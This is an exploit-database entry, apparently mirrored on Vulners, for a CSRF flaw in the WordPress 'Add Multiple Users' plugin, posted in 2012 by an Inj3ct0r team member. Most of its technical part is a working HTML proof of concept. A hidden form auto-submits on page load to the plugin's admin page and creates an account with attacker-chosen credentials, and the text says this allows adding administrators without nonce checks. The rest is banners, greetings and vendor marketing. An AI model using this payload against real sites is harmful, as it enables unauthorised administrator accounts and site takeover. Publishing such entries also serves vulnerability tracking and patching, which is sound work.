Vulners
Lucene search
Wordpress Plugin Add Multiple Users - CSRF Vulnerability
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
0 [x] Official Website: http://www.1337day.com 1
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 0
0 1
1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0
0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1
1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
«««:»»» Wordpress Plugin Add Multiple Users - CSRF Vulnerability «««:»»»
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
./Title Exploit : Wordpress Plugin Add Multiple Users - CSRF Vulnerability
./Link Download : http://wordpress.org/extend/plugins/add-multiple-users/
./Author Exploit: [ TheCyberNuxbie ] [ [email protected] ] [ nux_exploit ]
./Security Risk : [ Critical Level ]
./Category XPL : [ WebApps/ZeroDay ]
./Tested On : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
./Time & Date : September, 22 2012. 10:27 PM. Jakarta, Indonesia.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
||| -=[ Use It At Your Risk ]=- |||
||| This Was Written For Educational Purpos Only |||
||| Author Will Be Not Responsible For Any Damage |||
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
#################################################################################
#
# - Visit Plugin Website:
# http://addmultipleusers.happynuclear.com/
#
# - Add Multiple Users - Manual Entry Form:
# Attacker allow CSRF Add Administrator more than 1 account (multiple).
# http://localhost/wp-admin/admin.php?page=amumanual <--- Vuln CSRF, not require verification CODE "wpnonce".
#
# <html>
# <head>
# <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
# <title>Wordpress Plugin Add Multiple Users - CSRF Vulnerability</title>
# </head>
# <body onload="document.form0.submit();">
# <form method="POST" name="form0" action="http://localhost/wp-admin/admin.php?page=amumanual" enctype="multipart/form-data" class="amuform">
# <input type="hidden" name="user_login1" id="user_login1" value="nuxbie"/>
# <input type="hidden" name="user_pass1" id="user_pass1" value="nuxbie"/>
# <input type="hidden" name="user_email1" id="user_email1" value="[email protected]"/>
# <option type="hidden" value="administrator"></option>
# <input type="hidden" name="first_name1" value="nuxbie" />
# <input type="hidden" name="last_name1" value="nuxbie" />
# <input type="hidden" readonly="readonly" name="processes" id="processes" value="1" />
# <input type="hidden" readonly="readonly" name="proclist" id="proclist" value="user_login user_pass user_email role first_name last_name " />
# </form>
# </table>
# </form>
# </body>
# </html>
#
# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
# - Special Thanks:
# ...:::' 1337day - Inj3ct0r TEAM ':::...
# BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,,
# , And All Inj3ct0r Fans & All Hacktivist,,,
#
# xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx #
# [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de | SekuritiOnline ] #
# [ Codenesia | ID-BackTrack | IndonesianCoder | IndonesianHacker | JatimCrew ] #
# [ E-C-H-O | ExploreCrew | Hacker-Newbie | Jasakom | YogyaCarderLink ./etc.. ] #
# -------------------[ We Are c0d3rs And We Are An Exploit ]------------------- #
# [ r0073r, Sid3^effects, r4dc0re, CrosS, SeeMe, indoushka, KnocKout, ZoRLu ] #
# [ anT!-Tr0J4n, KedAns-Dz, Kalashinkov3, Angel Injection, Sammy FORGIT, NoGe ] #
# [ cr4wl3r, n0n0x, cyberlog, eidelweiss, v3n0m, g3mb3lz_YCL, Hmei7, kaMtiEz ] #
# [ y3dips, K-159, the_day, k1tk4t, mywisdom, Flyff666, ketek_b374k, Elmonny ] #
# [ jos_ali_joe, vYc0d, Cyberbag0r, SeekerUnZero, Dencowbie, Alex_Maxsum41 ] #
# [ Teh Nofia, Teh Mawar, Teh Zuzzeta, Teh AfniGates, Chibie Reanaey ,etc... ] #
#################################################################################
# 0day.today [2018-04-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Sep 2012 00:00Current
7.1High risk
Vulners AI Score7.1